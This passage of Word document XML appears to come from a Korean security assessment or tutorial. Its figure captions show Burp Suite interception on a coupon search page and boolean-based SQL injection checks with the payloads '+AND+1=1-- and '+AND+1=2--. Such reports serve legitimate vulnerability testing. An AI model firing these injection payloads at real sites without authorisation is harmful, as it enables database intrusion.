          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251440128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D0A13A1" wp14:editId="79B6BE8C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2222402</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1589405</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2021791" cy="292833"/>
                <wp:effectExtent l="0" t="0" r="17145" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="54" name="직사각형 54"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2021791" cy="2928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A82E6" id="직사각형 54" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:175pt;margin-top:125.15pt;width:159.2pt;height:23.0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WxsgIAAJQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6r3bcZG2MOkXQIsOA&#10;oi3WDj0rshQbkCVNUuJkt+4fCuwPdtlh3zV0/zBKst2gK3YY5oMsieQj+UTy5HTbCLRhxtZKFnh0&#10;kGLEJFVlLVcF/ni7eHOMkXVElkQoyQq8Yxafzl6/Oml1zjJVKVEygwBE2rzVBa6c03mSWFqxhtgD&#10;pZkEIVemIQ6OZpWUhrSA3ogkS9O3SatMqY2izFq4PY9CPAv4nDPqrji3zCFRYIjNhdWEdenXZHZC&#10;8pUhuqppFwb5hygaUktwOkCdE0fQ2tR/QDU1Ncoq7g6oahLFeU1ZyAGyGaXPsrmpiGYhFyDH6oEm&#10;+/9g6eXm2qC6LPBkjJEkDbzR47f7xy/ff/64//X1AcE1cNRqm4Pqjb423cnC1ie85abxf0gFbQOv&#10;u4FXtnWIwmWWZqOj6QgjCrJsmh0fHnrQ5MlaG+veMdUgvymwgXcLdJLNhXVRtVfxzqRa1ELAPcmF&#10;RC0U3jSdpMHCKlGXXuqF1qyWZ8KgDYHnXyxS+DrHe2oQhpAQjc8xZhV2bidYdPCBcWDI5xE9+Npk&#10;AyyhlEk3iqKKlCx6m+w76y1CzkICoEfmEOWA3QH0mhGkx44MdPrelIXSHoy71P9mPFgEz0q6wbip&#10;pTIvZSYgq85z1O9JitR4lpaq3EH9GBUby2q6qOEFL4h118RAJ0HPwXRwV7BwoeClVLfDqFLm80v3&#10;Xh8KHKQYtdCZBbaf1sQwjMR7CaU/HY3HvpXDYTw5yuBg9iXLfYlcN2cKXh+qD6ILW6/vRL/lRjV3&#10;METm3iuIiKTgu8DUmf5w5uLEgDFE2Xwe1KB9NXEX8kZTD+5Z9RV6u70jRndl7KABLlXfxSR/Vs1R&#10;11tKNV87xetQ6k+8dnxD64fC6caUny3756D1NExnvwEAAP//AwBQSwMEFAAGAAgAAAAhADpP9Mfh&#10;AAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyojdumIcSpAAkhEAcocHdj&#10;N4lqr6PYTcLfs5zgODuj2TfldvaOjXaIXUAF1wsBzGIdTIeNgs+Px6scWEwajXYBrYJvG2FbnZ+V&#10;ujBhwnc77lLDqARjoRW0KfUF57FurddxEXqL5B3C4HUiOTTcDHqicu+4FCLjXndIH1rd24fW1sfd&#10;ySt4C8cDd19Svmzun+Tm2edTM74qdXkx390CS3ZOf2H4xSd0qIhpH05oInMKlmtBW5ICuRZLYJTI&#10;snwFbE+Xm2wFvCr5/w3VDwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQB&#10;AAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBypiWxsgIAAJQF&#10;AAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQA6T/TH4QAA&#10;AAsBAAAPAAAAAAAAAAAAAAAAAAwFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAGgYA&#10;AAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3097F61D" wp14:editId="72B8EA0E">
            <wp:extent cx="4570174" cy="2009042"/>
            <wp:effectExtent l="19050" t="19050" r="20955" b="1079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306" b="7538"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2009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20721D" w14:textId="2A3394E5" w:rsidR="00995BFE" w:rsidRPr="00E72D99" w:rsidRDefault="00995BFE" w:rsidP="0079680F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="292" w:name="_Toc209094583"/>
      <w:r w:rsidRPr="00E72D99">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[그림] </w:t>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림] \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E72D99">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003229EA" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0079680F" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="00C40C72" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="0079680F" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt; Intercept on</w:t>
      </w:r>
      <w:r w:rsidR="003229EA" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003229EA" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>후</w:t>
      </w:r>
      <w:r w:rsidR="00DD4D0F" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003229EA" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003229EA" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>쿠폰</w:t>
      </w:r>
      <w:r w:rsidR="003229EA" w:rsidRPr="00E72D99">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 페이지에서 검색어 입력</w:t>
      </w:r>
      <w:bookmarkEnd w:id="292"/>
    </w:p>
    <w:p w14:paraId="72C68D9C" w14:textId="77777777" w:rsidR="00995BFE" w:rsidRPr="00CB22A6" w:rsidRDefault="00995BFE" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46339A06" w14:textId="7D353172" w:rsidR="00995BFE" w:rsidRDefault="00995BFE" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251429888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5BC2661F" wp14:editId="3AF81C30">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4150995</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1851807</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="728134" cy="237067"/>
                <wp:effectExtent l="0" t="0" r="15240" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="37" name="직사각형 3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95E8" id="직사각형 37" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:326.85pt;margin-top:145.8pt;width:57.35pt;height:18.6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e9sgIAAJMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdp2rRRN1XUKgip&#10;aiNa1LPjtbMreT3GdrIJt/IOSLwBFw48FyrvwNj706hUHBA5bDyemW883/ycnW8rRTbCuhJ0RgcH&#10;KSVCc8hLvcroh7v5mxNKnGc6Zwq0yOhOOHo+ff3qrDYTMYQCVC4sQRDtJrXJaOG9mSSJ44WomDsA&#10;IzQqJdiKeRTtKsktqxG9UskwTY+TGmxuLHDhHN5eNko6jfhSCu5vpHTCE5VRfJuPXxu/y/BNpmds&#10;srLMFCVvn8H+4RUVKzUG7aEumWdkbcs/oKqSW3Ag/QGHKgEpSy5iDpjNIH2WzW3BjIi5IDnO9DS5&#10;/wfLrzcLS8o8o4djSjSrsEaP3x4eP3//+ePh19cvBK+Ro9q4CZremoVtJYfHkPBW2ir8YypkG3nd&#10;9byKrSccL8fDk8HhiBKOquHhOD2OmMmTs7HOvxVQkXDIqMWyRTbZ5sp5DIimnUmIpWFeKhVLpzSp&#10;se9O06M0ejhQZR60wc7Z1fJCWbJhWP35PMVfSAbR9sxQUhovQ4pNUvHkd0oEDKXfC4kEYRrDJkJo&#10;TdHDMs6F9oNGVbBcNNGO9oN1HjF0BAzIEl/ZY7cAnWUD0mE3b27tg6uInd07t6n/zbn3iJFB+965&#10;KjXYlzJTmFUbubHvSGqoCSwtId9h+1ho5soZPi+xglfM+QWzOEg4crgc/A1+pAKsFLQnSgqwn166&#10;D/bY36ilpMbBzKj7uGZWUKLeaez808FoFCY5CqOj8RAFu69Z7mv0uroArP4A15Dh8RjsveqO0kJ1&#10;jztkFqKiimmOsTPKve2EC98sDNxCXMxm0Qyn1zB/pW8ND+CB1dChd9t7Zk3bxh77/xq6IWaTZ93c&#10;2AZPDbO1B1nGVn/iteUbJz82TrulwmrZl6PV0y6d/gYAAP//AwBQSwMEFAAGAAgAAAAhAEEQjPXh&#10;AAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyoUxeSNGRTARJCIA5Q2rsb&#10;u0lUex3FbhL+HnOC42qeZt6Wm9kaNurBd44QlosEmKbaqY4ahN3X800OzAdJShpHGuFbe9hUlxel&#10;LJSb6FOP29CwWEK+kAhtCH3Bua9bbaVfuF5TzI5usDLEc2i4GuQUy63hIklSbmVHcaGVvX5qdX3a&#10;ni3ChzsdudkL8ZY9vojs1eZTM74jXl/ND/fAgp7DHwy/+lEdquh0cGdSnhmE9G6VRRRBrJcpsEhk&#10;aX4L7ICwEvkaeFXy/z9UPwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQB&#10;AAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDhnve9sgIAAJMF&#10;AAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBBEIz14QAA&#10;AAsBAAAPAAAAAAAAAAAAAAAAAAwFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAGgYA&#10;AAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000C4EA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB6D9C5" wp14:editId="5B5E3614">
            <wp:extent cx="4571187" cy="2091104"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="2349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8669"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4571187" cy="2091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B7DD" w14:textId="38318E6D" w:rsidR="00995BFE" w:rsidRDefault="00995BFE" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="293" w:name="_Toc206630363"/>
      <w:bookmarkStart w:id="294" w:name="_Toc206630501"/>
      <w:bookmarkStart w:id="295" w:name="_Toc20909458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11</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002208A3" w:rsidRPr="002208A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>참</w:t>
      </w:r>
      <w:r w:rsidR="002208A3" w:rsidRPr="002208A3">
        <w:t xml:space="preserve"> 조건 검증('+AND+1=1--)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="293"/>
      <w:bookmarkEnd w:id="294"/>
      <w:bookmarkEnd w:id="295"/>
    </w:p>
    <w:p w14:paraId="17A27167" w14:textId="68F58723" w:rsidR="00995BFE" w:rsidRPr="002208A3" w:rsidRDefault="00BF78A6" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE54745" w14:textId="7DACD1BE" w:rsidR="00995BFE" w:rsidRDefault="00D662A2" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="296" w:name="_Toc206630364"/>
      <w:bookmarkStart w:id="297" w:name="_Toc206630502"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251445248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69F752AB" wp14:editId="484D7289">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4152265</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1851171</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="728134" cy="237067"/>
                <wp:effectExtent l="0" t="0" r="15240" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="57" name="직사각형 5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368E" id="직사각형 57" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:326.95pt;margin-top:145.75pt;width:57.35pt;height:18.6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IUsgIAAJMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdp0rRRN1XUKgip&#10;aita1LPjtbMreT3GdrIJt/IOSLwBFw48FyrvwNj706hUHBA5bDyemW883/ycnm0rRTbCuhJ0RgcH&#10;KSVCc8hLvcroh7vFm2NKnGc6Zwq0yOhOOHo2e/3qtDZTMYQCVC4sQRDtprXJaOG9mSaJ44WomDsA&#10;IzQqJdiKeRTtKsktqxG9UskwTY+SGmxuLHDhHN5eNEo6i/hSCu6vpXTCE5VRfJuPXxu/y/BNZqds&#10;urLMFCVvn8H+4RUVKzUG7aEumGdkbcs/oKqSW3Ag/QGHKgEpSy5iDpjNIH2WzW3BjIi5IDnO9DS5&#10;/wfLrzY3lpR5RscTSjSrsEaP3x4eP3//+ePh19cvBK+Ro9q4KZremhvbSg6PIeGttFX4x1TINvK6&#10;63kVW084Xk6Gx4PDESUcVcPDSXoUMZMnZ2OdfyugIuGQUYtli2yyzaXzGBBNO5MQS8OiVCqWTmlS&#10;Y9+dpOM0ejhQZR60wc7Z1fJcWbJhWP3FIsVfSAbR9sxQUhovQ4pNUvHkd0oEDKXfC4kEYRrDJkJo&#10;TdHDMs6F9oNGVbBcNNHG+8E6jxg6AgZkia/ssVuAzrIB6bCbN7f2wVXEzu6d29T/5tx7xMigfe9c&#10;lRrsS5kpzKqN3Nh3JDXUBJaWkO+wfSw0c+UMX5RYwUvm/A2zOEg4crgc/DV+pAKsFLQnSgqwn166&#10;D/bY36ilpMbBzKj7uGZWUKLeaez8k8FoFCY5CqPxZIiC3dcs9zV6XZ0DVn+Aa8jweAz2XnVHaaG6&#10;xx0yD1FRxTTH2Bnl3nbCuW8WBm4hLubzaIbTa5i/1LeGB/DAaujQu+09s6ZtY4/9fwXdELPps25u&#10;bIOnhvnagyxjqz/x2vKNkx8bp91SYbXsy9HqaZfOfgMAAP//AwBQSwMEFAAGAAgAAAAhAHLaDujh&#10;AAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyoU1dN3DSbCpAQAnGAQu9u&#10;7CZR43UUu0n4e8wJjqt5mnlb7GbbsdEMvnWEsFwkwAxVTrdUI3x9Pt1JYD4o0qpzZBC+jYddeX1V&#10;qFy7iT7MuA81iyXkc4XQhNDnnPuqMVb5hesNxezkBqtCPIea60FNsdx2XCRJyq1qKS40qjePjanO&#10;+4tFeHfnE+8OQrxmD88ie7Fyqsc3xNub+X4LLJg5/MHwqx/VoYxOR3ch7VmHkK5Xm4giiM1yDSwS&#10;WSpTYEeElZASeFnw/z+UPwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQB&#10;AAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD5A2IUsgIAAJMF&#10;AAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBy2g7o4QAA&#10;AAsBAAAPAAAAAAAAAAAAAAAAAAwFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAGgYA&#10;AAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0004369A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69CB09DA" wp14:editId="5E2FC05E">
            <wp:extent cx="4571187" cy="2096965"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="1778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442"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2097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96"/>
      <w:bookmarkEnd w:id="297"/>
    </w:p>
    <w:p w14:paraId="6FEC0D83" w14:textId="430D325D" w:rsidR="00995BFE" w:rsidRDefault="00995BFE" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="298" w:name="_Toc206630365"/>
      <w:bookmarkStart w:id="299" w:name="_Toc206630503"/>
      <w:bookmarkStart w:id="300" w:name="_Toc209094585"/>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12</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0004369A" w:rsidRPr="0004369A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>거짓</w:t>
      </w:r>
      <w:r w:rsidR="0004369A" w:rsidRPr="0004369A">
        <w:t xml:space="preserve"> 조건 검증('+AND+1=2--)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="298"/>
      <w:bookmarkEnd w:id="299"/>
      <w:bookmarkEnd w:id="300"/>
    </w:p>
    <w:p w14:paraId="4DCF4690" w14:textId="77777777" w:rsidR="00995BFE" w:rsidRDefault="00995BFE" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D2D26A" w14:textId="51EF1C96" w:rsidR="00995BFE" w:rsidRDefault="001F10C6" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="301" w:name="_Toc206630366"/>
      <w:bookmarkStart w:id="302" w:name="_Toc206630504"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251394048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49863683" wp14:editId="68F3C4BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1272833</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1272442</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="532814" cy="1177486"/>
                <wp:effectExtent l="0" t="0" r="19685" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="59" name="직사각형 59"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="532814" cy="11774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DD6A" id="직사각형 59" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:100.2pt;margin-top:100.2pt;width:41.95pt;height:92.7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idsgIAAJQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHdD0p9VN1XUKgip&#10;KhUt6tnx2tmVvB5jO3/cyjsg8QZcOPBcqLwDY+9Po1JxQOSwsT0z3/j7PDOnZ9tGkbWwrgZd0Owg&#10;pURoDmWtlwX9cDt/dUyJ80yXTIEWBd0JR8+mL1+cbkwuRlCBKoUlCKJdvjEFrbw3eZI4XomGuQMw&#10;QqNRgm2Yx61dJqVlG0RvVDJK08NkA7Y0FrhwDk8vWiOdRnwpBffvpHTCE1VQvJuPXxu/i/BNpqcs&#10;X1pmqpp312D/cIuG1RqTDlAXzDOysvUfUE3NLTiQ/oBDk4CUNReRA7LJ0idsbipmROSC4jgzyOT+&#10;Hyy/Wl9bUpcFnZxQolmDb/Tw7f7h8/efP+5/ff1C8Bg12hiXo+uNubbdzuEyEN5K24R/pEK2Udfd&#10;oKvYesLxcPJ6dJyNKeFoyrKjo/HxYQBNHqONdf6NgIaERUEtvluUk60vnW9de5eQTMO8VgrPWa40&#10;2SDqSTpJY4QDVZfBGozOLhfnypI1w+efz1P8dYn33PAaSuNtAseWVVz5nRJtgvdCokLIY9RmCLUp&#10;BljGudA+a00VK0WbbbKfrI+InJVGwIAs8ZYDdgfQe7YgPXarQOcfQkUs7SG4o/634CEiZgbth+Cm&#10;1mCfY6aQVZe59e9FaqUJKi2g3GH9WGgbyxk+r/EFL5nz18xiJ2HP4XTw7/AjFeBLQbeipAL76bnz&#10;4I8FjlZKNtiZBXUfV8wKStRbjaV/ko3HoZXjZjw5GuHG7lsW+xa9as4BXz/DOWR4XAZ/r/qltNDc&#10;4RCZhaxoYppj7oJyb/vNuW8nBo4hLmaz6Ibta5i/1DeGB/CgaqjQ2+0ds6YrY48NcAV9F7P8STW3&#10;viFSw2zlQdax1B917fTG1o+F042pMFv299HrcZhOfwMAAP//AwBQSwMEFAAGAAgAAAAhAL0E4Yzd&#10;AAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAMhu9IvENkJG4sJRssKk0nQEIIxAEG3LPG&#10;a6s1TtVkbXl7zAHBzZZ/ff7+YjP7Tow4xDaQgctFBgKpCq6l2sDH+8OFBhGTJWe7QGjgCyNsytOT&#10;wuYuTPSG4zbVgiEUc2ugSanPpYxVg97GReiR+LYPg7eJ16GWbrATw30nVZZdS29b4g+N7fG+weqw&#10;PXoDr+Gwl92nUs/ru0e1fvJ6qscXY87P5tsbEAnn9BeGH31Wh5KdduFILorOANNXHP0dOKH0agli&#10;Z2CprzTIspD/O5TfAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsA&#10;AAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACtRiJ2yAgAAlAUAAA4A&#10;AAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAL0E4YzdAAAACwEA&#10;AA8AAAAAAAAAAAAAAAAADAUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAWBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A025BF4" wp14:editId="6ACF8AC2">
            <wp:extent cx="4571187" cy="2472104"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="2349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851"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="24725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01"/>
      <w:bookmarkEnd w:id="302"/>
    </w:p>
    <w:p w14:paraId="7417635B" w14:textId="019110AE" w:rsidR="003B54C1" w:rsidRDefault="00995BFE" w:rsidP="003B54C1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="303" w:name="_Toc206630367"/>
      <w:bookmarkStart w:id="304" w:name="_Toc206630505"/>
      <w:bookmarkStart w:id="305" w:name="_Toc209094586"/>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13</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003B54C1" w:rsidRPr="003B54C1">
        <w:rPr>
